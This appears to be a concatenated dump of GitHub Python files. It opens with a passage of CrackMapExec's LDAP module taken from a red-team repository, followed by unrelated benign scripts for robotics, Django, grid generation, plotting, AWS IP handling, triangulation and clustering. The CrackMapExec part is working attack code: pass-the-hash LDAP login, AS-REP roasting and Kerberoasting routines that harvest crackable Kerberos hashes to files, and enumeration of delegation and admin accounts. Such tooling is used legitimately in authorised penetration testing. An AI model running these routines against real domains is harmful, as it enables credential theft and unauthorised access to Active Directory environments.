self.logger.highlight(u'{}'.format(hash_TGT))\n with open(self.args.asreproast, 'a+') as hash_asreproast:\n hash_asreproast.write(hash_TGT + '\\n')\n return False\n\n # Connect to LDAP\n out = u'{}{}:{}'.format('{}\\\\'.format(domain),\n username,\n password)\n try:\n self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)\n self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)\n self.logger.success(out)\n except ldap_impacket.LDAPSessionError as e:\n if str(e).find('strongerAuthRequired') >= 0:\n # We need to try SSL\n try:\n self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)\n self.ldapConnection.login(self.username, self.password, self.domain, 
self.lmhash, self.nthash)\n self.logger.success(out)\n except ldap_impacket.LDAPSessionError as e:\n self.logger.error(u'{}\\{}:{}'.format(self.domain, \n self.username, \n self.password))\n else:\n self.logger.error(u'{}\\{}:{}'.format(self.domain, \n self.username, \n self.password))\n return False\n\n return True\n\n def hash_login(self, domain, username, ntlm_hash):\n lmhash = ''\n nthash = ''\n\n #This checks to see if we didn't provide the LM Hash\n if ntlm_hash.find(':') != -1:\n lmhash, nthash = ntlm_hash.split(':')\n else:\n nthash = ntlm_hash\n\n self.hash = ntlm_hash\n if lmhash: self.lmhash = lmhash\n if nthash: self.nthash = nthash\n\n self.username = username\n self.domain = domain\n # Create the baseDN\n self.baseDN = ''\n domainParts = self.domain.split('.')\n for i in domainParts:\n self.baseDN += 'dc=%s,' % i\n # Remove last ','\n self.baseDN = self.baseDN[:-1]\n\n if self.kdcHost is not None:\n target = self.kdcHost\n else:\n target = domain\n\n if self.hash == '' and self.args.asreproast:\n hash_TGT = KerberosAttacks(self).getTGT_asroast(self.username)\n if hash_TGT:\n self.logger.highlight(u'{}'.format(hash_TGT))\n with open(self.args.asreproast, 'a+') as hash_asreproast:\n hash_asreproast.write(hash_TGT + '\\n')\n return False\n\n # Connect to LDAP\n out = u'{}{}:{}'.format('{}\\\\'.format(domain),\n username,\n nthash)\n try:\n self.ldapConnection = ldap_impacket.LDAPConnection('ldap://%s' % target, self.baseDN, self.kdcHost)\n self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)\n\n self.logger.success(out)\n except ldap_impacket.LDAPSessionError as e:\n if str(e).find('strongerAuthRequired') >= 0:\n try:\n # We need to try SSL\n self.ldapConnection = ldap_impacket.LDAPConnection('ldaps://%s' % target, self.baseDN, self.kdcHost)\n self.ldapConnection.login(self.username, self.password, self.domain, self.lmhash, self.nthash)\n self.logger.success(out)\n except ldap_impacket.LDAPSessionError as e:\n self.logger.error(u'{}\\{}:{}'.format(self.domain, \n self.username, \n self.nthash))\n else:\n self.logger.error(u'{}\\{}:{}'.format(self.domain, \n self.username, \n self.nthash))\n return False\n\n return True\n\n def create_smbv1_conn(self):\n try:\n self.conn = SMBConnection(self.host, self.host, None, 445, preferredDialect=SMB_DIALECT)\n self.smbv1 = True\n except socket.error as e:\n if str(e).find('Connection reset by peer') != -1:\n logging.debug('SMBv1 might be disabled on {}'.format(self.host))\n return False\n except Exception as e:\n logging.debug('Error creating SMBv1 connection to {}: {}'.format(self.host, e))\n return False\n\n return True\n\n def create_smbv3_conn(self):\n try:\n self.conn = SMBConnection(self.host, self.host, None, 445)\n self.smbv1 = False\n except socket.error:\n return False\n except Exception as e:\n logging.debug('Error creating SMBv3 connection to {}: {}'.format(self.host, e))\n return False\n\n return True\n\n def create_conn_obj(self):\n if self.create_smbv1_conn():\n return True\n elif self.create_smbv3_conn():\n return True\n\n return False\n\n def getUnixTime(self, t):\n t -= 116444736000000000\n t /= 10000000\n return t\n\n def asreproast(self):\n if self.password == '' and self.nthash == '' and self.kerberos == False:\n return False\n # Building the search filter\n searchFilter = \"(&(UserAccountControl:1.2.840.113556.1.4.803:=%d)\" \\\n \"(!(UserAccountControl:1.2.840.113556.1.4.803:=%d))(!(objectCategory=computer)))\" % \\\n (UF_DONT_REQUIRE_PREAUTH, UF_ACCOUNTDISABLE)\n\n try:\n 
logging.debug('Search Filter=%s' % searchFilter)\n resp = self.ldapConnection.search(searchFilter=searchFilter,\n attributes=['sAMAccountName',\n 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],\n sizeLimit=999)\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n # We reached the sizeLimit, process the answers we have already and that's it. Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n logging.debug(e)\n return False\n\n answers = []\n logging.debug('Total of records returned %d' % len(resp))\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = ''\n memberOf = ''\n pwdLastSet = ''\n userAccountControl = 0\n lastLogon = 'N/A'\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n sAMAccountName = str(attribute['vals'][0])\n mustCommit = True\n elif str(attribute['type']) == 'userAccountControl':\n userAccountControl = \"0x%x\" % int(attribute['vals'][0])\n elif str(attribute['type']) == 'memberOf':\n memberOf = str(attribute['vals'][0])\n elif str(attribute['type']) == 'pwdLastSet':\n if str(attribute['vals'][0]) == '0':\n pwdLastSet = ''\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'lastLogon':\n if str(attribute['vals'][0]) == '0':\n lastLogon = ''\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n if mustCommit is True:\n answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.debug('Skipping item, cannot process due to error %s' % str(e))\n pass\n if len(answers)>0:\n for user in answers:\n hash_TGT = KerberosAttacks(self).getTGT_asroast(user[0])\n self.logger.highlight(u'{}'.format(hash_TGT))\n with open(self.args.asreproast, 'a+') as hash_asreproast:\n hash_asreproast.write(hash_TGT + '\\n')\n return True\n else:\n self.logger.error(\"No entries found!\")\n\n def kerberoasting(self):\n # Building the search filter\n searchFilter = \"(&(servicePrincipalName=*)(UserAccountControl:1.2.840.113556.1.4.803:=512)\" \\\n \"(!(UserAccountControl:1.2.840.113556.1.4.803:=2))(!(objectCategory=computer)))\"\n\n try:\n resp = self.ldapConnection.search(searchFilter=searchFilter,\n attributes=['servicePrincipalName', 'sAMAccountName',\n 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],\n sizeLimit=999)\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n # We reached the sizeLimit, process the answers we have already and that's it. 
Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n return False\n\n answers = []\n logging.debug('Total of records returned %d' % len(resp))\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = ''\n memberOf = ''\n SPNs = []\n pwdLastSet = ''\n userAccountControl = 0\n lastLogon = 'N/A'\n delegation = ''\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n sAMAccountName = str(attribute['vals'][0])\n mustCommit = True\n elif str(attribute['type']) == 'userAccountControl':\n userAccountControl = str(attribute['vals'][0])\n if int(userAccountControl) & UF_TRUSTED_FOR_DELEGATION:\n delegation = 'unconstrained'\n elif int(userAccountControl) & UF_TRUSTED_TO_AUTHENTICATE_FOR_DELEGATION:\n delegation = 'constrained'\n elif str(attribute['type']) == 'memberOf':\n memberOf = str(attribute['vals'][0])\n elif str(attribute['type']) == 'pwdLastSet':\n if str(attribute['vals'][0]) == '0':\n pwdLastSet = ''\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'lastLogon':\n if str(attribute['vals'][0]) == '0':\n lastLogon = ''\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'servicePrincipalName':\n for spn in attribute['vals']:\n SPNs.append(str(spn))\n\n if mustCommit is True:\n if int(userAccountControl) & UF_ACCOUNTDISABLE:\n logging.debug('Bypassing disabled account %s ' % sAMAccountName)\n else:\n for spn in SPNs:\n answers.append([spn, sAMAccountName,memberOf, pwdLastSet, lastLogon, delegation])\n except Exception as e:\n logging.error('Skipping item, cannot process due to error %s' % str(e))\n pass\n\n if len(answers)>0:\n users = dict( (vals[1], vals[0]) for vals in answers)\n TGT = KerberosAttacks(self).getTGT_kerberoasting()\n for user, SPN in users.items():\n try:\n serverName = Principal(SPN, type=constants.PrincipalNameType.NT_SRV_INST.value)\n tgs, cipher, oldSessionKey, sessionKey = getKerberosTGS(serverName, self.domain,\n self.kdcHost,\n TGT['KDC_REP'], TGT['cipher'],\n TGT['sessionKey'])\n r = KerberosAttacks(self).outputTGS(tgs, oldSessionKey, sessionKey, user, SPN)\n self.logger.highlight(u'{}'.format(r))\n with open(self.args.kerberoasting, 'a+') as hash_kerberoasting:\n hash_kerberoasting.write(r + '\\n')\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.error('SPN: %s - %s' % (SPN,str(e)))\n else:\n self.logger.error(\"No entries found!\")\n\n def trusted_for_delegation(self):\n # Building the search filter\n searchFilter = \"(userAccountControl:1.2.840.113556.1.4.803:=524288)\"\n try:\n logging.debug('Search Filter=%s' % searchFilter)\n resp = self.ldapConnection.search(searchFilter=searchFilter,\n attributes=['sAMAccountName',\n 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],\n sizeLimit=999)\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n # We reached the sizeLimit, process the answers we have already and that's it. 
Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n return False\n answers = []\n logging.debug('Total of records returned %d' % len(resp))\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = ''\n memberOf = ''\n pwdLastSet = ''\n userAccountControl = 0\n lastLogon = 'N/A'\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n sAMAccountName = str(attribute['vals'][0])\n mustCommit = True\n elif str(attribute['type']) == 'userAccountControl':\n userAccountControl = \"0x%x\" % int(attribute['vals'][0])\n elif str(attribute['type']) == 'memberOf':\n memberOf = str(attribute['vals'][0])\n elif str(attribute['type']) == 'pwdLastSet':\n if str(attribute['vals'][0]) == '0':\n pwdLastSet = ''\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'lastLogon':\n if str(attribute['vals'][0]) == '0':\n lastLogon = ''\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n if mustCommit is True:\n answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.debug('Skipping item, cannot process due to error %s' % str(e))\n pass\n if len(answers)>0:\n logging.debug(answers)\n for value in answers:\n self.logger.highlight(value[0])\n else:\n self.logger.error(\"No entries found!\")\n return\n\n def admin_count(self):\n # Building the search filter\n searchFilter = \"(adminCount=1)\"\n try:\n logging.debug('Search Filter=%s' % searchFilter)\n resp = self.ldapConnection.search(searchFilter=searchFilter,\n attributes=['sAMAccountName',\n 'pwdLastSet', 'MemberOf', 'userAccountControl', 'lastLogon'],\n sizeLimit=999)\n except ldap_impacket.LDAPSearchError as e:\n if e.getErrorString().find('sizeLimitExceeded') >= 0:\n logging.debug('sizeLimitExceeded exception caught, giving up and processing the data received')\n # We reached the sizeLimit, process the answers we have already and that's it. 
Until we implement\n # paged queries\n resp = e.getAnswers()\n pass\n else:\n return False\n answers = []\n logging.debug('Total of records returned %d' % len(resp))\n\n for item in resp:\n if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:\n continue\n mustCommit = False\n sAMAccountName = ''\n memberOf = ''\n pwdLastSet = ''\n userAccountControl = 0\n lastLogon = 'N/A'\n try:\n for attribute in item['attributes']:\n if str(attribute['type']) == 'sAMAccountName':\n sAMAccountName = str(attribute['vals'][0])\n mustCommit = True\n elif str(attribute['type']) == 'userAccountControl':\n userAccountControl = \"0x%x\" % int(attribute['vals'][0])\n elif str(attribute['type']) == 'memberOf':\n memberOf = str(attribute['vals'][0])\n elif str(attribute['type']) == 'pwdLastSet':\n if str(attribute['vals'][0]) == '0':\n pwdLastSet = ''\n else:\n pwdLastSet = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n elif str(attribute['type']) == 'lastLogon':\n if str(attribute['vals'][0]) == '0':\n lastLogon = ''\n else:\n lastLogon = str(datetime.fromtimestamp(self.getUnixTime(int(str(attribute['vals'][0])))))\n if mustCommit is True:\n answers.append([sAMAccountName,memberOf, pwdLastSet, lastLogon, userAccountControl])\n except Exception as e:\n logging.debug(\"Exception:\", exc_info=True)\n logging.debug('Skipping item, cannot process due to error %s' % str(e))\n pass\n if len(answers)>0:\n logging.debug(answers)\n for value in answers:\n self.logger.highlight(value[0])\n else:\n self.logger.error(\"No entries found!\")\n return \n\n","repo_name":"ryanmrestivo/red-team","sub_path":"Exploitation-Tools/CrackMapExec/site-packages/cme/protocols/ldap.py","file_name":"ldap.py","file_ext":"py","file_size_in_byte":28725,"program_lang":"python","lang":"en","doc_type":"code","stars":91,"dataset":"github-code","pt":"21"} +{"seq_id":"24346878356","text":"'''\nCreated on 15.03.2013\n@author: Jens Seifried\nfor : Floribot ROS_Stage/Real\nDescription: Script to find Objekts in Laserscan \n and publish their cartesian coordinates\n'''\n#!/usr/bin/env python\nimport roslib; \nimport rospy\nimport math\nimport string\nfrom sensor_msgs.msg import LaserScan\nfrom sensor_msgs.msg import PointCloud\nfrom geometry_msgs.msg import Point32\nfrom sensor_msgs.msg import ChannelFloat32\n\n\ndef listener():\n rospy.Subscriber(\"scan\", LaserScan, callback)\n rospy.spin() \n \ndef callback(data):\n #Variablen\n message1 = PointCloud()\n channel = ChannelFloat32()\n channel.values = [] \n #Suchparameter \n search_Range = 4.0\n radius = 0.05\n #Schleifen-Startbedingung\n i_os = i_oe =1\n i=1\n while i < len(data.ranges):\n if data.ranges[i] <= search_Range:\n if abs(data.ranges[i]-data.ranges[i-1])< radius:\n point = Point32()\n i_os = i_oe = i\n count = 1\n stop = 0\n while abs(data.ranges[i_oe]-data.ranges[i_oe-1])< radius and stop == 0:\n count +=1\n if i_oe < len(data.ranges)-1: i_oe+=1\n if i_oe == len(data.ranges)-1: stop = 1\n \n i = i_oe\n count /=2\n if i_os+count < len(data.ranges):\n angle = data.angle_min+(i_os+count)*data.angle_increment\n point.x = math.cos(angle)*data.ranges[i_os+count]#-radius\n point.y = math.sin(angle)*data.ranges[i_os+count]#-radius\n point.z = 0\n if i_os+count > len(data.ranges):\n angle = data.angle_min+(len(data.ranges)-1)*data.angle_increment\n point.x = math.cos(angle)*data.ranges[len(data.ranges)-1]#-radius\n point.y = math.sin(angle)*data.ranges[len(data.ranges)-1]#-radius\n point.z = 0 \n channel.values.append(math.degrees(angle)) \n 
message1.points.append(point)\n i+=1\n \n message1.header.seq = data.header.seq\n message1.header.stamp = data.header.stamp\n message1.header.frame_id = data.header.frame_id\n channel.name = \"angle in degrees\"\n message1.channels.append(channel) \n \n #print message1.channels[0].values[4]\n #print message1.channels.values[3]\n #print '#######################################################' \n talker(message1) \n\ndef talker(send):\n #p = rospy.Publisher('ObjCloud', PointCloud)\n p.publish(send) \n \n \nif __name__ == '__main__':\n rospy.init_node('ObjektCloud', anonymous=True)\n p = rospy.Publisher('ObjCloud', PointCloud)\n listener()\n #print message\n ","repo_name":"TorstenHeverhagen/de-floribot-software","sub_path":"floribot_navigation/src/ObjCloud.py","file_name":"ObjCloud.py","file_ext":"py","file_size_in_byte":2780,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"568491543","text":"# _*_coding :utf-8 _*_\n# @Time :2022/9/11 18:54\n# @File : urls\n# @Project : python_Django\nfrom django.urls import path\nfrom .views import *\n\nurlpatterns = [\n path('add/', add),\n path('select/', select),\n path('update/', update),\n path('delete/', delete),\n\n\n]","repo_name":"wufake70/myPython","sub_path":"python_frame/db_001/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":270,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9502005753","text":"import sys\nimport random\n#print (sys.argv[:])\ntry:\n\tx_length = int(sys.argv[1])\n\ty_length = int(sys.argv[2])\nexcept:\n\tsys.exit(sys.argv[0]+\": Usage argv1=xlength,argv2=ylength\")\ngrid = []\ndeigma = [ \"O\" for x in range(x_length) ]\n\n#### PUT FIRST RANDOMLY AS SALT AND PEPPER THE OBSTACLES #######\nfor y in range(y_length):\n grid.append(deigma[:])\n for k in range(random.randrange(0,x_length)):\n grid[y][random.randrange(0,x_length)]='X'\n\n#### PUT WALLS AND PACKAGES OF OBSTACLE RANDOMLY ###\n\n#### HORIZONTALLY #####\n\nfor y in range(y_length):\n if(random.uniform(0,1)>0.8):\n deigma = ['X' for x in range(random.randrange(0,x_length)) ]\n start_position = random.randrange(0,x_length) \n for k in range(start_position,start_position+len(deigma)):\n grid[y][k%x_length]='X'\n\n\n#### VERTICALLY #### \n\nfor x in range(x_length):\n if(random.uniform(0,1)>0.8):\n deigma = ['X' for y in range(random.randrange(0,y_length)) ]\n start_position = random.randrange(0,y_length) \n for k in range(start_position,start_position+len(deigma)):\n grid[k%y_length][x]='X'\n\nrobot1=[0,0]\nrobot2=[0,0]\nok = False\nwhile not ok:\n robot1=[random.randrange(y_length),random.randrange(x_length)]\n if grid[robot1[0]][robot1[1]]!='X':\n ok = True\nok = False\n\nwhile not ok:\n robot2=[random.randrange(y_length),random.randrange(x_length)]\n if grid[robot2[0]][robot2[1]]!='X':\n ok = True\n\nprint(str(x_length)+\" \"+str(y_length))\nprint(str(robot1[1])+\" \"+str(robot1[0]))\nprint(str(robot2[1])+\" \"+str(robot2[0]))\nfor row in grid:\n print(\"\".join(row))\n","repo_name":"papajim/artificial_inteligence","sub_path":"Askisi1/testcases/testgenerator.py","file_name":"testgenerator.py","file_ext":"py","file_size_in_byte":1553,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"1311337823","text":"import numpy as np\nimport cv2\n\nclass Triangulator:\n def __init__(self, mtx):\n \"\"\"\n Constructor for Triangulator class.\n\n Parameters:\n - mtx: intrinsic camera 
matrix\n \"\"\"\n self.mtx = mtx\n \n def triangulate(self, kp1, kp2, R, t, matches, matchesMask):\n \"\"\"\n Triangulates 3D points from a set of correspondences and camera poses.\n\n Parameters:\n - kp1: keypoints in first image\n - kp2: keypoints in second image\n - R: rotation matrix from second to first camera\n - t: translation vector from second to first camera\n - matches: list of matches between keypoints\n\n Returns:\n - pts_3d: list of 3D points\n \"\"\"\n pts1 = np.float32([kp1[m.queryIdx].pt for m in matches]).reshape(-1, 1, 2)\n pts2 = np.float32([kp2[m.trainIdx].pt for m in matches]).reshape(-1, 1, 2)\n\n pts1 = pts1[np.asarray(matchesMask) == 1, :, :]\n pts2 = pts2[np.asarray(matchesMask) == 1, :, :]\n\n proj_mat1 = np.dot(self.mtx, np.hstack((np.eye(3), np.zeros((3, 1)))))\n proj_mat2 = np.dot(self.mtx, np.hstack((R, t)))\n\n proj_pts1 = cv2.undistortPoints(pts1, self.mtx, None)\n proj_pts2 = cv2.undistortPoints(pts2, self.mtx, None)\n\n proj_pts1 = np.squeeze(proj_pts1).T\n proj_pts2 = np.squeeze(proj_pts2).T\n\n pts_4d_hom = cv2.triangulatePoints(proj_mat1, proj_mat2, proj_pts1, proj_pts2)\n pts_3d_hom = pts_4d_hom / pts_4d_hom[3]\n pts_3d = pts_3d_hom[:3].T\n return pts_3d","repo_name":"MichaelFYang/sfm-3d-vision","sub_path":"triangulator.py","file_name":"triangulator.py","file_ext":"py","file_size_in_byte":1550,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"14535310395","text":"import importlib.util\n\nfrom ec2mc import consts\n\ndef main(instance, new_ip):\n \"\"\"pass along instance info to handler under config's ip_handlers\"\"\"\n if consts.USE_HANDLER is False:\n return\n if 'IpHandler' not in instance['tags']:\n return\n\n handler_base = instance['tags']['IpHandler']\n handler_path = consts.IP_HANDLER_DIR / handler_base\n if not handler_path.is_file():\n print(f\" {handler_base} not found from config's ip_handlers.\")\n return\n\n handler = _load_script(handler_path)\n if handler is not None:\n handler.main(instance['name'], new_ip)\n\n\ndef _load_script(script_path):\n \"\"\"load python script\"\"\"\n try:\n spec = importlib.util.spec_from_file_location(\"handler\", script_path)\n handler = importlib.util.module_from_spec(spec)\n spec.loader.exec_module(handler)\n return handler\n except ImportError as e:\n handler_base = script_path.name\n print(f\" {e.name} package required by {handler_base} not found.\")\n print(f\" Install with \\\"python -m pip install {e.name}\\\".\")\n return None\n","repo_name":"TakingItCasual/ec2mc","sub_path":"ec2mc/utils/handle_ip.py","file_name":"handle_ip.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23386959927","text":"\"\"\"\n\n Raul Valenzuela\n raul.valenzuela@colorado.edu\n\n\n\"\"\"\n\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport tta_analysis3 as tta\nimport pandas as pd\nimport tta_continuity\nfrom matplotlib import rcParams\nfrom rv_utilities import discrete_cmap\n\nrcParams['xtick.labelsize'] = 15\nrcParams['ytick.labelsize'] = 15\nrcParams['axes.labelsize'] = 15\nrcParams['mathtext.default'] = 'sf'\n\n# years = [1998]\nyears = [1998] + range(2001, 2013)\n\ntry:\n wd_layer\nexcept NameError:\n out = tta.preprocess(years=years,layer=[0,500])\n wd_layer = out['wd_layer'][out['WD_rain'].index]\n\nhours_df = pd.DataFrame()\nevents_df = pd.DataFrame()\n\nthres = [140]\nmax_events = 55\nn_event = range(1, max_events)\ncatalog = 
pd.DataFrame(index=n_event,\n columns=years)\n\nfor th in thres:\n\n hours = np.array([])\n events = np.array([])\n\n for year in range(1998,2013):\n\n if year in [1999, 2000]:\n hours = np.append(hours, [0])\n events = np.append(events, [0])\n else:\n target = wd_layer[str(year)][wd_layer[str(year)] < th]\n time_df = tta_continuity.get_df(target)\n hist = time_df.clasf.value_counts()\n\n catalog[year][hist.index] = hist.values\n\ndcmap = discrete_cmap(7, base_cmap='Set1')\ncls = [dcmap(0),dcmap(1),dcmap(2)]\nscale = 1.3\n\n\n''' histogram '''\n# axes = catalog.fillna(0).hist(bins=np.arange(0.5,22.5),\n# sharex=True,\n# sharey=True,\n# grid=False)\n# axes = axes.flatten()\n# means = list()\n# for ax in axes[:-3]:\n# ax.set_xlim([0, 21.5])\n# ax.set_ylim([0, 35])\n# title = ax.get_title()\n# ax.set_title(title, x=0.8, y=0.75)\n# median = np.percentile(catalog[:][int(title)].dropna(),q=50)\n# mean = np.mean(catalog[:][int(title)].dropna())\n# ax.text(0.95,0.65,'median:{}\\nmean:{:2.1f}'.format(median,mean),\n# ha='right',va='top',\n# transform=ax.transAxes)\n# means.append(mean)\n#\n# for ax in [axes[0], axes[4], axes[8], axes[12]]:\n# ytl = ax.get_yticklabels()\n# for l in ytl[1::2]:\n# l.set_visible(False)\n#\n# axes[12].set_xlabel('n$^{\\circ}$ of hours')\n# axes[4].set_ylabel('n$^{\\circ}$ of events')\n#\n# plt.subplots_adjust(top=0.98, hspace=0.15, wspace=0.1)\n\n''' boxplot '''\ndata = list()\nfor year in years:\n data.append(catalog[:][year].dropna().tolist())\n\nfig,ax = plt.subplots()\n# bp = ax.boxplot(data,whis='range',showmeans=True)\nbp = ax.boxplot(data,\n whis='range',\n sym='',\n showmeans=True,\n showcaps=False,\n whiskerprops={\n 'linestyle': '-',\n 'color': 'k'},\n meanprops={\n 'marker': 'd',\n 'markersize': 0,\n 'markeredgecolor': None,\n 'markerfacecolor': 'r'},\n medianprops={'color': 'r',\n 'linewidth':0},\n boxprops={'color': 'k'}\n )\nlabs = [str(int(np.mod(y,100.))).zfill(2)\n for y in years]\n\n# median = np.mean([p.get_ydata()[0] for p in bp['medians']])\n# mean = np.mean([p.get_ydata()[0] for p in bp['means']])\n\nd=list()\nfor l in data:\n d.extend(l)\nmedian = np.median(d)\nmean = np.mean(d)\n\nax.hlines(y=median, xmin=0, xmax=22, linestyle='--',\n color='r', zorder=10000)\n\nax.hlines(y=mean, xmin=0, xmax=22, linestyle='-',\n color='r', zorder=10000)\n\nyticks = [0] + [np.round(median,1), np.round(mean,1)] + range(5,25,5)\n\nax.set_yticks(yticks)\n\nfor label in ax.get_yticklabels()[1:3]:\n label.set_color('r')\n\nax.set_ylim([0,22])\nax.set_xticklabels(labs)\nax.set_xlabel('winter season [year]')\nax.set_ylabel('TTA duration [hours]')\n\nplace = '/Users/raulvalenzuela/Documents/'\nfname = place+'fig_events_per_season_boxplot.png'\nplt.savefig(fname, dpi=150, format='png',papertype='letter',\n bbox_inches='tight')\n\n\n","repo_name":"rvalenzuelar/tta_climatology","sub_path":"figure_tta_events_per_season_v2.py","file_name":"figure_tta_events_per_season_v2.py","file_ext":"py","file_size_in_byte":3998,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25289712512","text":"import sys\nsys.path.append(\"../\")\nfrom numpy import sin, pi, arange\nfrom appJar import gui\n\nx = arange(0.0, 3.0, 0.01)\ny = sin(2*pi*x)\n\napp = gui()\naxes = app.addPlot(\"p1\", x, y)\naxes.legend(['key 
data'])\napp.go()\n","repo_name":"jarvisteach/appJar","sub_path":"examples/plot2.py","file_name":"plot2.py","file_ext":"py","file_size_in_byte":214,"program_lang":"python","lang":"en","doc_type":"code","stars":615,"dataset":"github-code","pt":"21"}
{"seq_id":"41674483678","text":"\n\nimport warnings\nwarnings.filterwarnings(\"ignore\")\nimport pandas as pd\nimport numpy as np\nimport wbgapi as wb\nimport matplotlib.pyplot as mpy\nimport seaborn as sns\nfrom sklearn.cluster import KMeans\nimport matplotlib.pyplot as plt\nimport errors\nimport cluster_tools\nfrom sklearn.preprocessing import normalize\n\n\"\"\"## Clustering (K-Means)\"\"\"\n\ncc = ['TUR','BRA','CHN','ISR'] # Selection of country codes\nind1=[\"EN.ATM.CO2E.KT\"] # Indicator for C02 Emission\nind1mn=['C02 Emission']\nind2=[\"EG.ELC.COAL.ZS\"] # indicator for Electricity production from coal source\nind2mn=['Electricity production from coal source']\n\nmy_dataframe1 = wb.data.DataFrame(ind1, cc, mrv=20).T # read data for C02 Emission\nmy_dataframe1=my_dataframe1.fillna(my_dataframe1.mean()) # clean data\nmy_dataframe1.head()\n\nmy_dataframe2 = wb.data.DataFrame(ind2, cc, mrv=50).T # read data for Electricity production from coal source\nmy_dataframe2=my_dataframe2.fillna(my_dataframe2.mean()) # clean data\nmy_dataframe2.head()\n\nclmns=my_dataframe1.columns\nclrs=\"rmby\" # assign colours\nfor i in range(len(clmns)):\n    mpy.figure(figsize=(6,3)) # plot figure size\n    mpy.title('C02 Emission by Country for {}'.format(clmns[i])) # plot title\n    mpy.plot(my_dataframe1[clmns[i]],\"{}D-\".format(clrs[i]),label=clmns[i]) # line chart\n    mpy.xlabel(\"Year\") # x-label of plotting\n    mpy.xticks(rotation=90) # x-label rotation \n    mpy.ylabel(\"C02 Emission\") # y-label of plotting\n    mpy.legend(loc=\"best\") # place legend\n    mpy.grid() # plot griding\n    mpy.show() # plot show\n\nfor i in range(len(clmns)):\n    mpy.figure(figsize=(8,3)) # plot figure size\n    mpy.title('Electricity production from coal source for {}'.format(clmns[i])) # plot title\n    mpy.plot(my_dataframe2[clmns[i]],\"{}D-\".format(clrs[i]),label=clmns[i]) # line chart\n    mpy.xlabel(\"Year\") # x-label of plotting\n    mpy.xticks(rotation=90) # x-label rotation\n    mpy.ylabel(\"Electricity production\") # y-label of plotting\n    mpy.legend(loc=\"best\") # place legend\n    mpy.grid() # plot griding\n    mpy.show() # plot show\n\ndef corrmapviz(dt): # to visualize country correlation with indicators\n    cluster_tools.map_corr(dt) # call process\ndfs=[my_dataframe1,my_dataframe2] # accumulate dataframes\ncorrmapviz(dfs[0]) # visualize correlation\ncorrmapviz(dfs[1]) # visualize correlation\n\ndef nrmdata(df): # method to call normalization process\n    nrmouts=cluster_tools.scaler(df) # call process\n    return nrmouts[0], nrmouts[1], nrmouts[2]\nscldfs=[]\nmnvls=[]\nmxvls=[]\nfor d in range(len(dfs)):\n    outnrm=nrmdata(dfs[d]) # calling method\n    scldfs.append(outnrm[0]) # storing scaled(normalized) data\n    mnvls.append(outnrm[1]) # storing minimum value\n    mxvls.append(outnrm[2]) # storing maximum value\nprint(scldfs[0].head(),\"\\n\")\nprint(scldfs[1].head())\n\ndef optclus(dt): # selection of optimum cluster value\n    optclus_ws = []\n    val=10\n    for i in range(1, val): # K-Means clustering with cluster 1 to 10\n        kmeans = KMeans(n_clusters=i, init='k-means++', max_iter=600, random_state=32) # create K-means model\n        kmeans.fit(dt) # train k-means model\n        optclus_ws.append(kmeans.inertia_) # Storing inertia values for all clusters\n    